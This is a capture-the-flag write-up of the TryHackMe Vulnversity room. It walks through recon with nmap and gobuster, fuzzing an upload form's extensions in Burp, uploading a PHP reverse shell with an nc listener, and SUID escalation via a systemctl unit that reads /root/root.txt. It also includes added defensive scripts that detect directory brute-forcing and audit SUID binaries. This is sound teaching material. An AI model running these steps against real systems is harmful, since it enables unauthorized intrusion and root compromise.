Vulnversity

Learn about active recon, web app attacks and privilege escalation.

Try this exercise in TryHackMe: Vulnversity

Reconnaissance

Scan the box

Nmap is a free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we use Nmap to scan the machine and identify the services running on each open port. Nmap has many capabilities; the table below summarises some of its functionality.

nmap -sV 10.10.X.X

Locating directories using Gobuster

Now let's run Gobuster with a wordlist using:

gobuster dir -u http://10.10.X.X:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
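A wordlist scan like the Gobuster run above leaves an obvious footprint on the server side: one client requesting many non-existent paths within seconds. The script below is an added example for this writeup, not part of the room; it parses constructed Apache/nginx combined-format log lines and flags any client with a burst of 404 responses inside a sliding time window. The sample lines, the 10-second window and the threshold of five are all assumptions chosen for illustration.

```python
"""Flag clients that produce a burst of 404s in a web access log, the
pattern a directory brute-force leaves behind. Added example; the log
lines below are constructed, not captured from the room's machine."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: 10.0.0.9 walks a wordlist, 10.0.0.5 is a normal user.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php HTTP/1.1" 200 1532
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /admin HTTP/1.1" 404 274
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /backup HTTP/1.1" 404 274
10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /images HTTP/1.1" 301 312
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /internal HTTP/1.1" 301 312
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /test HTTP/1.1" 404 274
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /old HTTP/1.1" 404 274
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /cgi-bin HTTP/1.1" 404 274
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /favicon.ico HTTP/1.1" 404 274
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /uploads HTTP/1.1" 404 274
"""


def parse_line(line):
    """Return a dict for one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_dir_bruteforce(log_text, window=timedelta(seconds=10), threshold=5):
    """Return {ip: max_404s_in_window} for clients that reach `threshold`
    404s inside any window of the given length. Timestamps are sorted per
    client so out-of-order lines (common with buffered logging) still work."""
    not_found = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            not_found[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, times in not_found.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # shrink the window from the left until it spans <= `window`
            while t - times[start] > window:
                start += 1
            hits = end - start + 1
            if hits >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), hits)
    return flagged


if __name__ == "__main__":
    for ip, hits in detect_dir_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {hits} x 404 within window, likely directory enumeration")
```

Counting 404s rather than raw request rate keeps a busy legitimate client from tripping the rule, while a scanner that hits mostly missing paths is caught within a few seconds of starting.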

Compromise the Webserver

Now that we have found a form that accepts file uploads, we can use it to upload and execute a payload, which compromises the web server. We will fuzz the upload form to identify which file extensions are not blocked.

Using BurpSuite

Now, make sure Burp Suite is configured to intercept all your browser traffic. Upload a file; once this request is captured, send it to Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions:

  • .php

  • .php3

  • .php4

  • .php5

  • .phtml

Load this wordlist (saved as phpext.txt) in the Payloads tab.

Select the Sniper attack type.

Find the filename in the captured request and mark its extension with § as the payload position. It should look like this:

Then click Start Attack

Running this attack in Intruder would ideally tell us which extensions are permitted and which are not. In this case, however, the responses show no notable difference in length or status code.

By brute-forcing the extensions, we identified that the upload form allows the .phtml extension.

Getting a Reverse Shell

We are going to use a PHP reverse shell as our payload. A reverse shell works by being executed on the remote host and forcing that host to make a connection back to you. So you listen for incoming connections, then upload and execute your shell, which connects back to give you control. You can download the PHP reverse shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and set the ip variable to the tun0 address of your AttackBox.

  2. Rename this file to reverse-shell.phtml.

  3. Listen for incoming connections using netcat. Run the following command: nc -lvnp 1234.

  4. Upload your shell and navigate to http://10.10.X.X:3333/internal/uploads/reverse-shell.phtml. This will execute your payload.

You should see a connection on your Netcat session.

Check the files on the machine.

We can now read the contents of user.txt.

Privilege Escalation

Now that we have compromised this machine, we will escalate our privileges and become the superuser (root).

In Linux, SUID (set owner user ID upon execution) is a particular type of file permission given to a file. SUID temporarily lets a user run the program with the permissions of the file's owner rather than with the permissions of the user who runs it.

For example, the binary that changes your password (/usr/bin/passwd) has the SUID bit set. Changing your password requires writing to the /etc/shadow file, which ordinary users cannot access; passwd is owned by root, so with SUID it runs with root privileges and can make the change.

find / -perm -u=s -type f 2>/dev/null

/bin/systemctl stands out: it is not normally SUID, and the binary is unusually large.

From GTFOBins, we search for the systemctl sudo privilege escalation steps.

We'll use option (b), which lets us specify the file that we want to open.
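Spotting /bin/systemctl in that find output relies on knowing which binaries are supposed to carry the SUID bit. The script below is an added example for this writeup, not from the room: it audits an inventory of SUID files against a baseline of binaries that normally have the bit on a stock Debian/Ubuntu-style system and flags anything outside it, anything unusually large, or anything living under a user-writable location. The inventory and the size threshold are constructed for illustration, and the baseline is a starting point, not a complete vendor list.

```python
"""Audit SUID binaries against a baseline. Added example; the inventory
below is constructed (not the room's machine) and EXPECTED_SUID is an
illustrative subset of what a stock Debian/Ubuntu install ships with SUID."""

# Collect real data with GNU find (path and size in bytes, one per line):
COLLECT_CMD = "find / -perm -u=s -type f -printf '%p %s\\n' 2>/dev/null"

EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/mount",
    "/bin/umount", "/bin/ping", "/usr/bin/pkexec", "/bin/su",
}

# Directories an unprivileged user can write to; a SUID file here is suspect.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed inventory in the format COLLECT_CMD produces.
SAMPLE_INVENTORY = """\
/usr/bin/passwd 59640
/usr/bin/sudo 149080
/bin/mount 40152
/bin/ping 64424
/bin/systemctl 659848
/home/alice/.cache/helper 16712
"""


def parse_inventory(text):
    """Yield (path, size_bytes) from 'path size' lines; paths may contain
    spaces, so split on the last space only."""
    for line in text.splitlines():
        line = line.rstrip()
        if not line:
            continue
        path, size = line.rsplit(" ", 1)
        yield path, int(size)


def audit_suid(inventory_text, baseline=EXPECTED_SUID, large_bytes=512_000):
    """Return {path: [reasons]} for every SUID file that deserves a look."""
    findings = {}
    for path, size in parse_inventory(inventory_text):
        reasons = []
        if path not in baseline:
            reasons.append("not in SUID baseline")
        if size > large_bytes:
            reasons.append(f"unusually large ({size} bytes)")
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("located under a user-writable directory")
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit_suid(SAMPLE_INVENTORY).items():
        print(f"{path}: {'; '.join(reasons)}")
```

On a real host, pipe the output of COLLECT_CMD into audit_suid and treat any finding as a change-management question: either the bit was set on purpose and belongs in the baseline, or it should be removed with chmod u-s.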

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

We cannot use sudo on this machine, so change the commands to:

  • /bin/systemctl link $TF

  • /bin/systemctl enable --now $TF

The flag is written to /tmp/output.
